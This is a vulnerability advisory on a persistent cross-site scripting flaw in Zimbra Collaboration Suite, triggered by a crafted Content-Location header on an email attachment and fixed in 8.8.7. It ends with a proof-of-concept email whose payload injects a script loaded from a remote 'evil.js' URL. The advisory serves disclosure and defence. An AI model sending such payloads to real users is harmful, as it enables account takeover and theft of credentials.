A Cross-Site Scripting (XSS) vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions such as performing arbitrary actions on their behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.
- Zimbra Collaboration 8.8.7 GA Release
- Persistent XSS - content-location
- Zimbra Collaboration - Security Vulnerability Advisories
This issue was successfully tested on ZCS 8.7.11_GA_1854 (build 20170531151956). It is however likely that this issue is present in all versions of ZCS from version 8.5.0 on.
The issue is fixed in Zimbra Collaboration Suite version 8.8.7.
Zimbra is an enterprise-class email, calendar and collaboration solution built for the cloud, both public and private. It has a browser-based interface. It runs on any device: smartphone, tablet and desktop or laptop computer running Windows, Linux or OS X.
A Cross-Site Scripting vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions such as performing arbitrary actions on their behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.
If an email is opened that contains one or more attachments, a link (
<a> tag) is created for each attachment. The code responsible for doing this is contained in the
In the above code the value for
params.href is taken directly from the
To exploit this issue an attacker can send an email with a specially crafted
Content-Location header to a victim user. When the victim opens this message the script code will be executed.
Proof of concept
---[snip]--- From: email@example.com To: firstname.lastname@example.org Subject: Re: My message MIME-Version: 1.0 Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET) Content-Type: multipart/mixed; boundary="----=_Part_112602234_144352703.1515072325170" ------=_Part_112602234_144352703.1515072325170 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit ------=_Part_112602234_144352703.1515072325170 Content-Type: text/plain; name=attachment.txt Content-Disposition: attachment; filename=attachment.txt Content-Transfer-Encoding: base64 Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='https://s3-eu-west-1.amazonaws.com/eviljs/evil.js';document.body.appendChild(window.x)><a href=' YXR0YWNobWVudAo= ------=_Part_112602234_144352703.1515072325170-- ---[snip]---